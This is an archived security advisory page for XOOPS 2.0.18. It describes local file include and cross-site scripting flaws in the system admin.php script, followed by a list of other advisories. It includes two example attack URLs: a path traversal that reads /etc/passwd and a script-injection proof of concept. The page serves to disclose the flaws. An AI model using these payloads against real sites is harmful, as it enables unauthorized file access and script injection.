exploits , vulnerabilities , articles , XOOPS Local File Include and Cross Site Scripting Vulnerabilities

Title	XOOPS Local File Include and Cross Site Scripting Vulnerabilities
Published	2008-07-21-12:00AM
Updated	2008-07-22-09:28PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	Ciph3r
Vulnerable	Xoops Xoops 2.0.18 1
Not Vulnerable
Code	Attackers can exploit this issue via a browser.The following example URIs are available:For the local file-include issue:http://www.example.com/scripts_path/modules/system/admin.php?fct=../../../../../../../../../../etc/passwd%00For the cross-site scripting issue:http://www.example.com/scripts_path/modules/system/admin.php?fct="><script>alert("xss")</script>
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Unspecified Stack Buffer Overflow Vulnerability
• 2009-12-11 Joomla! JS Jobs Component Multiple SQL Injection Vulnerabilities
• 2009-12-11 RT Session Fixation Vulnerability
• 2009-12-11 Multiple HP LaserJet Printers Unauthorized Access and Denial of Service Vulnerability
• 2009-12-11 Sun Ray Server Authentication Manager Remote Code Execution Vulnerability
• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 04:33:02 +0000